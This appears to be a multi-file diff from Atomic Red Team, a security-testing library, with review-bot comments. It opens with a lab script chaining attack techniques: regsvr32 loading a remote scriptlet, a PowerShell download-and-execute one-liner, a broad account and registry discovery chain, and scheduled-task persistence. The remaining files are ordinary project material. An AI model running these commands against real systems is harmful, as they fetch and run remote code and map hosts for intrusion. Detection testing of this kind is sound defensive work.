regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
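Review bot: the Step 2 discovery one-liner runs the same command twice (`net Accounts` near the start and `net accounts` later in the chain), and two of the `reg query` paths contain a doubled backslash (`...\Winlogon\\Shell` for both HKCU and HKLM) which looks like a typo for `\Winlogon\Shell`; please confirm those keys resolve as intended or fix the separator. In Step 3 the task is created as `/TN spawn` and deleted as `/TN Spawn`; task names are case-insensitive so this works, but one spelling avoids confusion when someone greps the telemetry. Since the `ONCE` task scheduled for `/ST 20:10` is deleted on the very next line, it never fires, so the comment should say the intent is only to generate the creation and deletion events, not to obtain execution. The three `NOTE` lines rightly warn against executing payloads from a repository you do not control, so it would help to point out that the `/i:https://raw.githubusercontent.com/...` URLs in Steps 1 and 2 are exactly what a reader is expected to replace with a server they own.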
@@ -8,7 +8,7 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
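Review bot: the change from `sc.exe query` to `sc query` is harmless inside cmd.exe, where `sc` resolves to sc.exe, but the same line pasted into PowerShell resolves `sc` to the `Set-Content` alias and does something else entirely; since this discovery sequence is also offered as a PowerShell `IEX ... DownloadString` one-liner elsewhere in this change, keeping the explicit `sc.exe` spelling is the safer choice. If the edit was made for consistency with the surrounding `net`, `reg` and `wmic` commands, a one-line commit note saying so would save the next reviewer the same question.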
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
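Review bot: the two sides of this hunk disagree on where reports go and who handles them: one side says to contact the Red Canary Open Source Team at `[email](mailto:opensource@redcanary.com)` and names a Community Manager as the enforcing party, the other says `research at redcanary.com` and the project team. Confirm which contact is meant to land and state it once, as a mailto link, in both the reporting and enforcement sections so the address can be found by grep. Minor wording in the reporting paragraph: `no matter if its privately or publicly witnessed` should read `if it's`.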
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.16.1
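Review bot: the lockfile pins the full github-pages 193 tree (jekyll 3.7.4, activesupport 4.2.10, nokogiri 1.10.1, rubyzip 1.2.2, ffi 1.10.0, among others) and nothing in the change set checks those pins against known advisories. Add a `bundle audit` (bundler-audit) step to the CI job that builds the docs so a vulnerable pin fails the build rather than shipping quietly, and plan to refresh the lockfile regularly since github-pages bumps these versions on its own. The `PATH` block with `remote: .` and the `atomic-red-team!` dependency mean the repository itself is installed as a gem for the docs build, so the `BUNDLED WITH 1.16.1` line also pins the Bundler version contributors need; worth a sentence in the contribution docs.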
+48 -40
View File
@@ -1,53 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" />
<a
href="https://opensourcesecurityindex.io/"
target="_blank"
rel="noopener"
>
<img
style="width: 282px; height: 56px"
src="https://opensourcesecurityindex.io/badge.svg"
alt="Open Source Security Index - Fastest Growing Open Source Security Projects"
width="282"
height="56"
/>
</a>
</p>
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1274-flat.svg)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
## Philosophy
## Get started
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
## Learn more
The best test is the one you actually run.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
See: https://atomicredteam.io
## Contribute to Atomic Red Team
## Having trouble?
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
## Getting Started
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
## Code of Conduct
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
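Review bot: the README points readers at two different Slack addresses, `https://atomicredteam.slack.com` in the "Having trouble?" and "Getting Started" items and `https://slack.atomicredteam.io` in the contributor list; settle on one (the `slack.atomicredteam.io` link is also the one that hands out invitations per the "Need a Slack invitation?" item) so the two lists do not send people to different places.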
+2 -2
View File
@@ -3,7 +3,7 @@ Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
@@ -12,4 +12,4 @@ Gem::Specification.new do |s|
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
end
+13 -59
View File
@@ -1,7 +1,7 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
<blockquote><%= technique['description'].gsub("%\\<", "%<") %></blockquote>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
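Review bot: the `.gsub("%\\<", "%<")` applied to `technique['description']` carries no explanation of which input it is neutralising, and the next editor will not know whether it is still needed; a one-line ERB comment naming the offending sequence in the ATT&CK descriptions would document it. The `technique['identifier'].gsub(/\./, '/')` in the heading link is fine: it maps a sub-technique id such as `T1234.001` to the `techniques/T1234/001` path used by attack.mitre.org.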
@@ -13,83 +13,37 @@
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'].strip -%>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
<% dependency_executor = test['executor']['name'] %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip %>
```
<% end -%>
<% end -%>
<br/>
<%- end -%>
<%- end -%>
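Review bot: `cleanup` escapes only backslashes (`input.to_s.strip.gsub(/\\/,"&#92;")`) before the value is dropped into a Markdown table cell, so an input argument whose description or default contains `|` will split the Inputs row into extra columns; escape pipes as well, e.g. `.gsub('|', '&#124;')`. `get_language` otherwise returns the executor name unchanged, which is a valid fence tag for `powershell`, `sh` and `bash`, so only `command_prompt` and `manual` needed mapping.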
+13 -111
View File
@@ -1,7 +1,6 @@
require 'yaml'
require 'erb'
require 'attack_api'
require 'securerandom'
class AtomicRedTeam
ATTACK_API = Attack.new
@@ -29,29 +28,6 @@ class AtomicRedTeam
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
test_list = Array.new
atomic_tests.find do |atomic_yaml|
if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
atomic_yaml['atomic_tests'].each do |a_test|
if a_test["supported_platforms"].include?(platform[:platform])
test_list.append(a_test)
end
end
end
end
test_list
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
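Review bot: `atomic_tests_for_technique_by_platform` uses `atomic_tests.find do |atomic_yaml| … end` purely for its side effects; `find` stops at the first block that returns a truthy value, which here is the first YAML whose technique matches (the `if` evaluates to the result of `each`), so it only works because each technique has one YAML file and should be `each`. The block also reads `platform[:platform]`, so the caller must pass a Hash although the name suggests a plain platform string; the comment above the method (copied from the neighbouring one) does not mention the platform filter at all.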
@@ -70,42 +46,26 @@ class AtomicRedTeam
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests for the given OS.
# techniques that have no existing tests.
#
def github_link_to_technique(technique, include_identifier: false, only_platform: self.only_platform)
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
